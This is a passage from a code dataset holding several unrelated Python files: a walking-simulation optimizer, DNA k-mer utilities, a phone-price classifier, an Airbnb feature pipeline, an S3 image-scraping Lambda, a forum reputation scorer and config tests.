(0,0,1))\n step_tar = mm.projectionOnPlane(step_tar, (1,0,0), (0,0,1))\n\n step_cur_sag, step_cur_cor = mm.projectionOnVector2(step_cur, direction)\n step_tar_sag, step_tar_cor = mm.projectionOnVector2(step_tar, direction)\n\n step_length_tar[0] = mm.length(step_tar_sag)\n if np.inner(step_tar_sag, step_cur_sag) > 0:\n step_length_cur[0] = mm.length(step_cur_sag)\n else:\n step_length_cur[0] = -mm.length(step_cur_sag)\n\n step_axis[0] = directionAxis\n\n seg_index[0] += 1\n curSeg = segments[seg_index[0]]\n stl_y_limit_num[0] = 0\n stl_xz_limit_num[0] = 0\n\n del motion_seg_orig[frame+1:]\n motion_seg_orig.extend(ymb.getAttachedNextMotion(curSeg, motion_seg_orig[-1], False, False))\n\n del motion_seg[frame+1:]\n del motion_stitch[frame+1:]\n transitionLength = len(curSeg)-1\n\n d = motion_seg[-1] - curSeg[0]\n d.rootPos[1] = 0.\n motion_seg.extend(ymb.getAttachedNextMotion(curSeg, d, True, False))\n\n if NO_FOOT_SLIDING:\n if segIndex == len(segments)-2:\n Rl = motion_control[-1].getJointOrientationLocal(lUpLeg)\n Rr = motion_control[-1].getJointOrientationLocal(rUpLeg)\n Rlk = motion_control[-1].getJointOrientationLocal(lKnee)\n Rrk = motion_control[-1].getJointOrientationLocal(rKnee)\n Rlf = motion_control[-1].getJointOrientationLocal(lFoot)\n Rrf = motion_control[-1].getJointOrientationLocal(rFoot)\n for p in curSeg:\n p.setJointOrientationLocal(lUpLeg, Rl, False)\n p.setJointOrientationLocal(rUpLeg, Rr, False)\n p.setJointOrientationLocal(lKnee, Rlk, False)\n p.setJointOrientationLocal(rKnee, Rrk, False)\n p.setJointOrientationLocal(lFoot, Rlf, False)\n p.setJointOrientationLocal(rFoot, Rrf, False)\n p.updateGlobalT()\n\n d = motion_control[-1] - curSeg[0]\n d.rootPos[1] = 0.\n motion_stitch.extend(ymb.getStitchedNextMotion(curSeg, d, transitionLength, stitch_func, True, False))\n\n else:\n motion_seg_orig.append(motion_seg_orig[-1])\n motion_seg.append(motion_seg[-1])\n motion_stitch.append(motion_control[-1])\n\n\n # rendering\n # motionModel.update(motion_ori[frame])\n if not isCma:\n # dartMotionModel.update(motion_stitch[frame])\n # dartMotionModel.update(motion_stf_balancing[frame])\n dartMotionModel.update(motion_seg[frame])\n # dartMotionModel.update(motion_ori[frame])\n # motionModel.update(motion_seg[frame])\n\n rd_CP[0] = CP\n # rd_CMP[0] = (CMreal[0] - (F[0]/F[1])*CMreal[1], 0, CMreal[2] - (F[2]/F[1])*CMreal[1])\n\n if plot is not None:\n plot.addDataPoint('zero', frame, 0)\n plot.updatePoints()\n\n if not isCma:\n viewer.setSimulateCallback(simulateCallback)\n\n if MULTI_VIEWER:\n viewer.startTimer(frameTime / 1.4)\n else:\n viewer.startTimer(frameTime * .1)\n viewer.show()\n\n Fl.run()\n else:\n objectiveSum = 0\n successSum = 0\n comSum = 0\n velSum = 0\n dirSum = 0\n\n for i in range(MAX_FRAME):\n simulateCallback(i)\n\n _com = dartModel.getCOM()\n\n if i > 50:\n successSum -= 1\n\n comSum += _com[2] * _com[2]\n\n _com_vel = dartModel.skeleton.com_velocity()\n _com_vel[1] = 0.\n velSum += (np.linalg.norm(_com_vel) - 0.7)*(np.linalg.norm(_com_vel)-0.7)\n\n dirDiff = mm.normalize(_com_vel) - np.array((-1., 0., 0.))\n dirSum += np.dot(dirDiff, dirDiff)\n\n if _com[1] < 0.65 or _com[1] > 1.0:\n break\n if i % 50 == 0 and (np.isnan(velSum) or np.isnan(dirSum)):\n break\n\n # objectiveSum = successSum + .3*comSum + velSum\n objectiveSum = successSum + velSum + .3*dirSum\n # print(objectiveSum, successSum, velSum, .3*dirSum, params)\n del motion_stitch[:]\n del motion_debug1[:]\n del motion_debug2[:]\n del motion_debug3[:]\n del motion_control[:]\n del motion_stf_balancing[:]\n del motion_match_stl[:]\n del motion_ori[:]\n del motion_seg[:]\n del motion_seg_orig[:]\n del motion_stf_push[:]\n del motion_stf_stabilize[:]\n del motion_swf_height[:]\n del motion_swf_placement[:]\n del motion_swf_orientation[:]\n return float(objectiveSum), float(successSum), float(velSum), float(.3*dirSum)\n # return float(objectiveSum)\n\n\nif __name__ == '__main__':\n # c_min_contact_vel = 100.\n # c_min_contact_time = .7\n # c_landing_duration = .2\n # c_taking_duration = .3\n # c_swf_mid_offset = .0\n # c_locking_vel = .05\n # c_swf_offset = .01\n\n # K_stp_pos = 0.\n # c5 = .7\n # c6 = .02\n # K_stb_vel = .1\n # K_stb_pos = .1\n # K_swp_vel_sag = .0\n # K_swp_vel_cor = 1.3\n # K_swp_pos_sag = 1.2\n # K_swp_pos_cor = 1.\n # K_swp_pos_sag_faster = .05\n\n # viewer.objectInfoWnd.add1DSlider(\"c_min_contact_vel\", 0., 200., .2, 100.)\n # viewer.objectInfoWnd.add1DSlider(\"c_min_contact_time\", 0., 5., .01, .7)\n # viewer.objectInfoWnd.add1DSlider(\"c_landing_duration\", 0., 5., .01, .2)\n # viewer.objectInfoWnd.add1DSlider(\"c_taking_duration\", 0., 5., .01, .3)\n # viewer.objectInfoWnd.add1DSlider(\"c_swf_mid_offset\", -1., 1., .001, 0.)\n # viewer.objectInfoWnd.add1DSlider(\"c_locking_vel\", 0., 1., .001, .05)\n # viewer.objectInfoWnd.add1DSlider(\"c_swf_offset\", -1., 1., .001, .01)\n\n # viewer.objectInfoWnd.add1DSlider(\"K_stp_pos\", 0., 1., .01, 0.)\n # viewer.objectInfoWnd.add1DSlider(\"c5\", 0., 5., .01, .7)\n # viewer.objectInfoWnd.add1DSlider(\"c6\", 0., 1., .01, .02)\n # viewer.objectInfoWnd.add1DSlider(\"K_stb_vel\", 0., 1., .01, .1)\n # viewer.objectInfoWnd.add1DSlider(\"K_stb_pos\", 0., 1., .01, .1)\n # viewer.objectInfoWnd.add1DSlider(\"K_swp_vel_sag\", 0., 5., .01, 0.)\n # viewer.objectInfoWnd.add1DSlider(\"K_swp_vel_cor\", 0., 5., .01, 1.3)\n # viewer.objectInfoWnd.add1DSlider(\"K_swp_pos_sag\", 0., 5., .01, 1.2)\n # viewer.objectInfoWnd.add1DSlider(\"K_swp_pos_cor\", 0., 5., .01, 1.)\n # viewer.objectInfoWnd.add1DSlider(\"K_swp_pos_sag_faster\",0., 1., .01, .05)\n\n\n # walkings(None, False)\n\n\n # hand tuning\n # params = [0., .7, .02, .1, .1, .0, 1.3, 1.2, 1., .05]\n # 325 frames success, Ks = 600.\n params = [ 0.01918975, 0.86622863, 0.15111008, 0.50972221, 0.09746768, -0.09129272, 1.12736657, 1.2873114 , 0.84409227, 0.38928674]\n\n # 347 frames success, Ks = 600. ????????\n # params = [-0.0096717475861028673, 0.51455174209881782, 0.1414213562373095, 0.31622776601683794, 0.19555994814530026, 0.0, 1.1401754250991381, 1.457290633087426, 0.78654212710618387, 0.61027611069961429]\n\n # 287 frames success, Ks = 1000.\n # params = [-0.15744347, 0.67592998, 0.14142136, 0.31622777, 0.35696289, 0., 1.14017543, 1.27637941, 0.95735647, 0.23835687]\n\n\n\n # 400 frames success, box foot, LCP, Kp = 200, Kd = 20\n # params = [-0.11523854, 0.56103475, 0.14142136, 0.31622777, 0.13175649, 0. , 1.14017543, 1.18703622, 0.77193057, 0.20490717]\n\n # infinite frames success, box foot, LCP, Kp = 200, Kd = 20, foot Kp = 80, foot Kd = 10\n params = [-0.13880733, 0.3439617, 0.14142136, 0.31622777, -0.18792631, 0., 1.14017543, 1.53473264, 1.07681499, 0.22992996]\n\n\n # 1220 frames success, parameter rounding, box foot, LCP, Kp = 200, Kd = 20, foot Kp = 80, foot Kd = 10,\n params = [-0.11608721, 0.42672724, 0.14142136, 0.31622777, -0.12770363, 0., 1.14017543, 1.63989139, 1.01964141, 0.18439344]\n\n # 1850 frames success, parameter rounding, box foot, LCP, Kp = 200, Kd = 20, foot Kp = 80, foot Kd = 10,\n params = [-0.10540525, 0.40167391, 0.14142136, 0.31622777, -0.06906434, 0., 1.14017543, 1.57445634, 1.01106981, 0.23834485]\n\n # infinite frames success, parameter rounding, box foot, LCP, Kp = 200, Kd = 20, foot Kp = 80, foot Kd = 10,\n # params = [-0.03424024, 0.32955692, 0.0850351 , 0.28576747, -0.10735104, 0.00185764, 1.36932697, 1.27616424, 0.97477866, 0.29608671]\n\n params = [ 0.23265769, 1.04283873, -0.29465862, 0.3544647, 0.2997252, -0.17338881, 2.08012922, 1.09571025, 0.6792339, -0.35920458]\n\n # DartTrackingFoot0 result, c_swf_mid_offset = 0.02\n params = [ 0.00745384, -0.56053261, 0.00921962, 0.42575388, 1.03165526, 0.69931117, 1.42782163, 1.65119398, 1.1237301 , 0.5327249 ]\n\n params = [0., .7, .02, .1, .1, .0, 1.3, 1.2, 1., .05]\n params = [ 0.52572998, 0.15153905, -0.59859175, 0.93952107, 0.49886098, -0.1271257, 0.7328913, 0.87975694, 1.73943837, -0.97777014]\n\n # 120 frames success\n params = [-0.03373822, 0.21621505, -0.46121163, 0.97844009, 1.26921316, 0.07107696, 1.43362972, 0.10045292, 1.40123327, -0.67596869]\n\n # 195 frames success\n params = [-0.156885745146, 0.224351871531, -0.651388957459, 0.803834992348, 1.05714177435, 0.00542880291931, 1.56462249867, -0.111631227361, 1.37037255808, -1.00517210154]\n isCma = False\n\n params = [-0.156885745146, 0.224351871531, 0., 0.803834992348, 1.05714177435, 0.00542880291931, 1.56462249867, -0.111631227361, 1.37037255808, -1.00517210154]\n if len(sys.argv) == 1 and not isCma:\n walkings(params, False)\n elif len(sys.argv) == 2 and sys.argv[1] == '-view' and not isCma:\n walkings(params, False)\n elif (len(sys.argv) == 2 and sys.argv[1] == '-cma') or isCma:\n # from PyCommon.modules.Math.Nomalizer import Normalizer\n # normalizer = Normalizer([0.]*10., [1., 5., .2, 1., 1., 3., 3., 3., 3., .5], [1.]*10, [-1.]*10)\n # c6, K_stb_vel, K_swp_vel_sag, K_swp_vel_cor is velocity gain\n # cmaOption = cma.CMAOptions('fixed_variables')\n # cmaOption.set('fixed_variables', {2:math.sqrt(.02), 3:math.sqrt(.1), 5:math.sqrt(0.), 6:math.sqrt(1.3)})\n # cma.fmin(walkings, np.sqrt([0., .5, .02, .1, .1, .0, 0.3, 1.2, .5, .05]).tolist(), .1, args=(True,), options=cmaOption)\n # cma.fmin(walkings, params, .1, args=(True,), options=cmaOption)\n # cma.fmin(walkings, params, .1, args=(True,))\n\n from datetime import datetime\n filename = datetime.now().strftime('%Y%m%d%H%M')+\".opt\"\n fout = open(filename, \"w\")\n fout.write(os.path.basename(__file__)+'\\n')\n es = cma.CMAEvolutionStrategy(params, .1,\n {'maxiter':100})\n fout.close()\n # {'maxiter':2, 'fixed_variables':{2:math.sqrt(.02), 3:math.sqrt(.1), 5:math.sqrt(0.), 6:math.sqrt(1.3)}})\n pool = mp.Pool(es.popsize)\n cmaCount = 0\n while not es.stop():\n fout = open(filename, \"a\")\n X = es.ask()\n f_values = pool.map_async(walkings, X).get()\n obj_values = [f_value[0] for f_value in f_values]\n es.tell(X, obj_values)\n es.disp()\n es.logger.add()\n\n print(cmaCount, min(f_values), X[np.argmin(obj_values)])\n fout.write(str(cmaCount)+' '+str(min(f_values)))\n for x in X[np.argmin(obj_values)]:\n fout.write(' '+str(x)+',')\n fout.write('\\n')\n cmaCount += 1\n fout.close()\n\n print(\"------------best-----------\")\n print(\"eval: \", es.best.evals)\n print(\"f: \", es.best.f)\n print(\"x: \", es.best.x)\n","repo_name":"hpgit/HumanFoot","sub_path":"DartWalkingFoot/main_DartTrackingFoot1.py","file_name":"main_DartTrackingFoot1.py","file_ext":"py","file_size_in_byte":100314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19211165399","text":"import collections\nimport itertools\nimport ReverseComplement\n\n\nNUCLEOTIDES = set('ACGT')\n\n\nclass Error(Exception):\n \"\"\"Base error.\"\"\"\n\n\ndef HammingDistance(input1, input2, max_d=None):\n max_d = max_d or float('inf')\n input1_length, input2_length = len(input1), len(input2)\n min_length = min(input1_length, input2_length)\n result = abs(input1_length - input2_length)\n for i1, i2 in itertools.izip(input1, input2):\n if i1 != i2:\n result += 1\n if result > max_d:\n return result\n return result\n\n\ndef AppPatternMatch(pattern, text, d):\n pattern_length = len(pattern)\n return [str(i)\n for i in xrange(len(text)-pattern_length+1)\n if HammingDistance(pattern,\n text[i:i+pattern_length],\n max_d=d)\n <= d]\n\n\ndef AppPatternCount(pattern, text, d):\n return len(AppPatternMatch(pattern, text, d))\n\n\ndef FreqKmerMismatch(text, k, d):\n counter = collections.Counter()\n freq = 0\n for kmer in GetKmers(text, k):\n counter[kmer] = AppPatternCount(kmer, text, d)\n freq = max(freq, counter[kmer])\n # Get k-mers that have max frequency and can be found in text.\n kmers = {kmer for kmer, count in counter.iteritems()\n if count == freq}\n # Get other possible k-mers that cannot be found in text.\n possible_kmers = {kmer2 for kmer1 in kmers for kmer2 in GetPossibleKmers(kmer1, d)\n if (kmer2 not in counter and\n AppPatternCount(kmer2, text, d) == freq)}\n return sorted(kmers.union(possible_kmers))\n\n\ndef FreqKmerMismatchReverse(text, k, d):\n counter = collections.Counter()\n freq = 0\n for kmer in GetMismatchKmers(text, k, d):\n reverse_kmer = ReverseComplement.ReverseComplement(kmer)\n counter[kmer] = GetKmersReversePatternCount(kmer, text, d)\n freq = max(freq, counter[kmer])\n kmers = {kmer for kmer, count in counter.iteritems()\n if count == freq}\n return sorted(kmers)\n\n\ndef GetKmers(text, k):\n kmers = {text[i:i+k] for i in xrange(len(text)-k+1)}\n return kmers\n\n\ndef GetMismatchKmers(text, k, d):\n kmers = {text[i:i+k] for i in xrange(len(text)-k+1)}\n possible_kmers = {kmer2\n for kmer1 in kmers\n for kmer2 in GetPossibleKmers(kmer1, d)}\n return kmers.union(possible_kmers)\n\n\ndef GetKmersReversePatternCount(kmer, text, d):\n reverse_kmer = ReverseComplement.ReverseComplement(kmer)\n return AppPatternCount(kmer, text, d) + AppPatternCount(reverse_kmer, text, d)\n\n\ndef GetPossibleKmers(k, d):\n for index_tuple in itertools.combinations(xrange(len(k)), d):\n # Find all possible bases that can be changed in k-mer's positions.\n for base_tuple in itertools.product(NUCLEOTIDES, repeat=d): \n if not OverlapBases(k, index_tuple, base_tuple):\n k_list = list(k)\n for index, base in itertools.izip(index_tuple, base_tuple):\n k_list[index] = base\n yield ''.join(k_list)\n\n\ndef OverlapBases(k, index_tuple, base_tuple):\n for index, base in itertools.izip(index_tuple, base_tuple):\n if k[index] == base:\n return True\n return False\n\n\ndef NeighborsOld(pattern, d):\n if not d:\n return pattern\n if len(pattern) == 1:\n return NUCLEOTIDES\n first, suffix = pattern[0], pattern[1:]\n neighbors = set()\n suffix_neighbors = Neighbors(suffix, d)\n for n in suffix_neighbors:\n if HammingDistance(suffix, n) < d:\n neighbors.update(s + n for s in NUCLEOTIDES)\n else:\n neighbors.add(first + n)\n return neighbors\n\n\ndef Neighbors(pattern, d):\n if not d:\n return set([pattern])\n if len(pattern) == 1:\n return NUCLEOTIDES\n first, suffix = pattern[0], pattern[1:]\n neighbors = set()\n for n in Neighbors(suffix, d):\n neighbors.add(first + n)\n suffix_neighbors = Neighbors(suffix, d-1)\n for s in NUCLEOTIDES:\n neighbors.update(s + n for n in suffix_neighbors)\n return neighbors\n","repo_name":"hkpcmit/BioInfo","sub_path":"HammingDistance.py","file_name":"HammingDistance.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"13324525326","text":"\n# 데이터설명 : 핸드폰 가격예측(종속변수 : price_range)\n# 데이터출처 : https://www.kaggle.com/iabhishekofficial/mobile-price-classification?select=train.csv\n# 문제타입 : 분류유형(다중)\n# 평가지표 : accuracy\n\nimport pandas as pd\ntrainData = pd.read_csv('https://raw.githubusercontent.com/Datamanim/datarepo/main/mobile/train.csv')\ntestData = pd.read_csv('https://raw.githubusercontent.com/Datamanim/datarepo/main/mobile/test.csv')\n\n\n# --------------------------------- \n# 1. 데이터 파악\n# 1-1. 결측값 파악: None\nprint(trainData.isnull().sum().sum(), testData.isnull().sum().sum())\n\n# 1-2. object 열 파악: None\nprint(trainData.select_dtypes('object').columns)\nprint(testData.select_dtypes('object').columns)\n\n# 1-3. 제외 열 파악: ['id']\nprint(trainData.columns)\nprint(testData.columns)\ntestData.drop(columns=['id'], inplace=True)\n\n# 1-4. X, y 정의하기\nX = trainData.drop(columns=['price_range'])\ny = trainData['price_range']\nprint(X.shape, testData.shape, y.shape)\n\n\n# --------------------------------- \n# 2. 전처리\nfrom sklearn.preprocessing import StandardScaler\nss = StandardScaler()\nss.fit(X)\nX = pd.DataFrame(ss.transform(X), columns=X.columns)\ntestData = pd.DataFrame(ss.transform(testData), columns=testData.columns)\nprint(X.mean().mean(), X.std().mean())\nprint(testData.mean().mean(), testData.std().mean())\n\n\n# --------------------------------- \n# 3. train, test split\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y, random_state=0)\n\n\n# --------------------------------- \n# 4. modeling, 학습, 예측, 평가\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nrf = RandomForestClassifier()\nrf.fit(X_train, y_train)\nprint(accuracy_score(rf.predict(X_test), y_test))\n\n\n# --------------------------------- \n# 5. 제출\ntestData['predict'] = rf.predict(testData)\ntestData[['predict']].to_csv('수험번호.csv', index=False)\n\n \n","repo_name":"parkmina365/Bigdata_Analyst_Certificate","sub_path":"작업형2유형/Classification/Mobile Price Classification.py","file_name":"Mobile Price Classification.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"28882027441","text":"import math\nimport pandas as pd\n\nfrom listings_pipeline import Listings\nfrom calendar_pipeline import Calendar\nfrom aux_model import AuxModel\n\nclass Merge():\n def __init__(self, listings_url, calendar_url):\n self.listings_url = listings_url\n self.calendar_url = calendar_url\n\n def __merge_listings_and_calendar(self, listings_data, calendar_data):\n listings_data = listings_data.loc[listings_data.id.isin(calendar_data.index)]\n calendar_data = calendar_data.loc[calendar_data.index.isin(listings_data.id)]\n merge_data = pd.merge(listings_data, calendar_data, left_on='id', right_index=True)\n return merge_data\n\n def __fill_missing_data(self, data):\n def avg_of_neighbors(row, col_name, cols_list, round_result=True):\n lat_diff = 0.002\n long_diff = 0.002\n cols_list = list(cols_list)\n item = row[cols_list.index(col_name)]\n room_type = row[cols_list.index('room_type')]\n latitude = row[cols_list.index('latitude')]\n longitude = row[cols_list.index('longitude')]\n if math.isnan(item):\n if round_result:\n item = data[col_name].loc[\n (data.latitude > latitude - lat_diff) &\n (data.latitude < latitude + lat_diff) &\n (data.longitude > longitude - long_diff) &\n (data.longitude < longitude + long_diff) &\n (data.room_type == room_type)\n ].mean().round()\n else:\n item = data[col_name].loc[\n (data.latitude > latitude - lat_diff) &\n (data.latitude < latitude + lat_diff) &\n (data.longitude > longitude - long_diff) &\n (data.longitude < longitude + long_diff) &\n (data.room_type == room_type)\n ].mean()\n row[cols_list.index(col_name)] = item\n return row\n\n data = data.apply(avg_of_neighbors, col_name='price_year_avg', cols_list=data.columns, round_result=False, axis=1)\n data = data.apply(avg_of_neighbors, col_name='price_winter_avg', cols_list=data.columns, round_result=False, axis=1)\n data = data.apply(avg_of_neighbors, col_name='price_spring_avg', cols_list=data.columns, round_result=False, axis=1)\n data = data.apply(avg_of_neighbors, col_name='price_summer_avg', cols_list=data.columns, round_result=False, axis=1)\n data = data.apply(avg_of_neighbors, col_name='price_fall_avg', cols_list=data.columns, round_result=False, axis=1)\n return data\n\n def __drop_data(self, data):\n data = data.drop(['id', 'room_type'], axis=1)\n data = data.drop(['description', 'amenities'], axis=1)\n return data\n\n def generate_features(self):\n listings_df = pd.read_csv(self.listings_url)\n calendar_df = pd.read_csv(self.calendar_url, parse_dates=['date'])\n listings_features = Listings(listings_df).generate_features()\n calendar_features = Calendar(calendar_df).generate_features()\n\n merged_features = self.__merge_listings_and_calendar(listings_features, calendar_features)\n merged_features = self.__fill_missing_data(merged_features)\n merged_features, aux_model_file = AuxModel(merged_features).train_and_save()\n merged_features = self.__drop_data(merged_features)\n default_features = merged_features.mean(axis=0).drop(labels=[\n 'price_year_avg', 'price_winter_avg', 'price_spring_avg', 'price_summer_avg', 'price_fall_avg',\n 'available_winter_avg', 'available_spring_avg', 'available_summer_avg', 'available_fall_avg',\n 'min_nights_winter_avg', 'min_nights_spring_avg', 'min_nights_summer_avg', 'min_nights_fall_avg'\n ])\n for idx, val in default_features.items():\n if idx != 'latitude' and idx != 'longitude' and idx != 'min_nights_year_avg' and idx != 'available_year_avg':\n default_features[idx] = round(val)\n default_features.to_json('default_features.json')\n return merged_features, aux_model_file\n","repo_name":"bruceplai/ml-capstone","sub_path":"merge_pipeline.py","file_name":"merge_pipeline.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28692742901","text":"import boto3\nimport requests\nimport time\nimport os\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse\ndef handler(event,context):\n r = requests.get(\"https://misanimales.com/\")\n s3 = boto3.resource('s3')\n soup = BeautifulSoup(r.text, 'html.parser')\n images = soup.find_all(\"img\")\n for image in images:\n url = image.get(\"src\")\n if url.startswith(\"http\"):\n a = urlparse(url)\n archivo=os.path.basename(a.path)\n img_file= requests.get(url)\n f=open(f\"/tmp/{archivo}\",\"wb\")\n f.write(img_file.content)\n f.close()\n s3.meta.client.upload_file(f\"/tmp/{archivo}\", \"bucketparaguardarfotos\",f'imagenes/{archivo}')\n return {\n 'statusCode': 200\n }","repo_name":"Trolmico/Parcial3BigData","sub_path":"1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33018187581","text":"import numpy as np\n\n# sample input\nannotations = np.array([[1, 1, -1, 0, -1],\n [0, 1, 5, 23, 23],\n [0, 0, -1, 1, 1]])\n\n# add one to all elements so -1 becomes 0\nannotations += 1\n\n# get the bincount along axis 1 for the unique values\n# equivalent to bincounts = np.array([np.bincount(row, minlength=np.max(annotations)+1) for row in annotations])\nbincounts = np.apply_along_axis(np.bincount, axis=1, arr=annotations, minlength=np.max(annotations)+1)\nprint(bincounts)\n\n# set the count for 0 to 0\nbincounts[:, 0] = 0\n\n# get the majority vote, and subtract 1 so 0 becomes -1 again\nmaj_vote = np.argmax(bincounts, axis=1) - 1\n\nprint(maj_vote)","repo_name":"minnesotanlp/annotation-imputation","sub_path":"utilities/variance_disagreement_graphs/quick_test.py","file_name":"quick_test.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"5801367356","text":"# from sklearn import tree \n# #创建训练集\n# X= [[0,0],[1,1]]\n# Y = [0,1]\n\n# clf = tree.DecisionTreeClassifier()\n# clf = clf.fit(X,Y)\n# #预测\n# c = clf.predict([[3.,3.]])\n# print(c)\n# #预测每个类的概率\n# d = clf.predict_proba([[2., 2.]])\n# print(d)\n\n# 使用iris数据集\nfrom sklearn.datasets import load_iris\nfrom sklearn import tree \nX , y = load_iris(return_X_y=True)\nclf = tree.DecisionTreeClassifier()\nclf = clf.fit(X,y)\ntree.plot_tree(clf) \n\nimport graphviz \ndot_data = tree.export_graphviz(clf,out_file=None)\ngraph = graphviz.Source(dot_data)\ngraph.render(\"iris\")\ndot_data = tree.export_graphviz(clf, out_file=None, \n feature_names=iris.feature_names, \n class_names=iris.target_names, \n filled=True, rounded=True, \n special_characters=True) \ngraph = graphviz.Source(dot_data) \ngraph \n\n","repo_name":"zrshizr/Machine-Learning","sub_path":"Decision_tree.py","file_name":"Decision_tree.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19781227332","text":"import mysql.connector\nimport pandas as pd\nimport numpy as np\nimport decimal\n\n#connect to database\ncnx = mysql.connector.connect(host='127.0.0.1', database='Fidelis', user='root')\n\n#create cursor\ncursor = cnx.cursor(buffered=True)\n\n#Get each user's total positive vote rep, negative vote rep and comment rep.\n#Returns table in the form: user_id, positive, negative, comment.\nquery = (\"SELECT post_id, ((COUNT(post_id) - 1) * 0.2) AS comments, (up_votes * 0.1) AS positive, (down_votes * 0.1) AS negative FROM comments GROUP BY post_id\")\ncursor.execute(query)\n\nd = pd.DataFrame(np.zeros((cursor.rowcount, 2)))\n\n#for each tuple...\ncount = 0\nfor post_id, comments, positive, negative in cursor:\n reputation = positive - negative\n\n #Make sure 'comments' field is not empty (Only returns number when there is at least one comment)\n if(isinstance(comments, decimal.Decimal)):\n reputation += comments\n\n #update data frame to store reputations\n d.set_value(count, 0, post_id)\n d.set_value(count, 1, reputation)\n\n count += 1\n\n#get min and max recorded reputation scores, then find difference between them\nmin_rep = d[1].min()\nmax_rep = d[1].max()\ndiff = max_rep - min_rep\n\n#if min = max, all have same reputation score, scale all scores to 0\nif(diff == 0):\n d[1] = 0\nelse:\n #scale between 0 and 1 and update reputation values in database\n d[1] = d[1].apply(lambda x: (x - min_rep)/(diff))\n\n#iterate through each row of dataframe and update users table with new reputation value\nfor ind, row in d.iterrows():\n add_rep = (\"UPDATE posts SET reputation = {} WHERE id = {}\".format(row[1], row[0]))\n cursor.execute(add_rep)\n cnx.commit()\n\n#close cursor and connection to database\ncursor.close()\ncnx.close()","repo_name":"ntanzeel/Fidelis","sub_path":"scripts/Reputation Scoring/Post_Rep_Score.py","file_name":"Post_Rep_Score.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"74301284527","text":"import copy\n\nimport aibox\nimport pytest\nfrom aibox.config import (\n SUPPORTED_INIT_ARGS_KEYS,\n SUPPORTED_INIT_TARGET_KEYS,\n config_from_dict,\n init_from_cfg,\n ConfigDict,\n)\nfrom aibox.utils import as_path\nfrom omegaconf import DictConfig\n\n\ndef make_config_variations():\n specs = []\n for target_key in SUPPORTED_INIT_TARGET_KEYS:\n # No args\n specs.append(\n (\n f\"targetonly-noargs-{target_key}\",\n {\n target_key: \"aibox.config.ConfigDict\",\n },\n )\n )\n # With args\n specs.append(\n (\n f\"targetonly-args-{target_key}\",\n {\n target_key: \"aibox.config.ConfigDict\",\n \"a\": 2,\n },\n )\n )\n # With args and other keys\n for arg_key in SUPPORTED_INIT_ARGS_KEYS:\n specs.append(\n (\n f\"paired-{target_key}-{arg_key}\",\n {\n target_key: \"aibox.config.ConfigDict\",\n arg_key: {\"a\": 2},\n \"other\": {\n \"something_that_should_not_be_touched\": 10000,\n \"nested_dicts\": {\"a\": 1, \"b\": {\"c\": 2}},\n },\n },\n )\n )\n\n # Deprecated structure\n specs.extend(\n [\n (\n \"deprecated-1\",\n {\n \"target\": \"aibox.config.ConfigDict\",\n \"kwargs\": {\"a\": 2},\n \"other\": {\"something_that_should_not_be_touched\": 10000},\n },\n ),\n (\n \"deprecated-2\",\n {\n \"class_path\": \"aibox.config.ConfigDict\",\n \"args\": {\"a\": 2},\n \"other\": {\"something_that_should_not_be_touched\": 10000},\n },\n ),\n ]\n )\n return specs\n\n\n@pytest.mark.parametrize(\"name,config\", make_config_variations())\ndef test_config_parse(name, config):\n # TODO: test cases that should fail well\n config_copy = copy.deepcopy(config)\n callback = init_from_cfg(config)\n if \"-args-\" in name:\n assert callback.a == 2\n assert config_copy == config\n if \"other\" in config:\n assert (\n config[\"other\"][\"something_that_should_not_be_touched\"] == 10000\n ), f\"Other keys should not be touched: {name}\"\n\n\n@pytest.mark.parametrize(\"name,config\", make_config_variations())\ndef test_config_dict(name, config):\n config = ConfigDict(**config)\n callback = init_from_cfg(config)\n\n assert isinstance(callback, ConfigDict)\n if \"-args-\" in name:\n assert callback.a == 2\n if \"other\" in config:\n assert isinstance(config[\"other\"], ConfigDict)\n assert not isinstance(config[\"other\"].to_dict(), ConfigDict)\n if \"nested_dicts\" in config[\"other\"]:\n assert isinstance(config[\"other\"][\"nested_dicts\"], ConfigDict)\n assert not isinstance(config[\"other\"][\"nested_dicts\"].to_dict(), ConfigDict)\n assert (\n config[\"other\"][\"something_that_should_not_be_touched\"] == 10000\n ), f\"Other keys should not be touched: {name}\"\n\n\ndef test_config_conversion():\n config_dict = ConfigDict()\n config_dict.__classpath__ = \"aibox.config.ConfigDict\"\n config_dict.a = 2\n config = config_from_dict(config_dict)\n assert isinstance(config, DictConfig), f\"Expected DictConfig, got {type(config)}\"\n\n\ndef test_as_path_resolver():\n user_dir = as_path(\"~\")\n config = ConfigDict()\n config.root_dir = \"${as_path:'~'}\"\n config = config_from_dict(config)\n assert str(config.root_dir) == str(user_dir), f\"Expected {user_dir}, got {config.root_dir}\"\n","repo_name":"dk0d/aibox","sub_path":"tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"20708518832","text":"import datetime\n\nfrom connection import connection_handler\n\n\n@connection_handler\ndef get_applicants_who_made_a_test_between_two_dates(cursor, date_from=\"\", date_to=\"\") -> list[dict]:\n if not date_from:\n date_from = str((datetime.datetime.strptime(date_to, \"%Y-%m-%d\") - datetime.timedelta(days=14)).date())\n if not date_to:\n date_to = str(datetime.date.today())\n\n query = \"\"\"\n 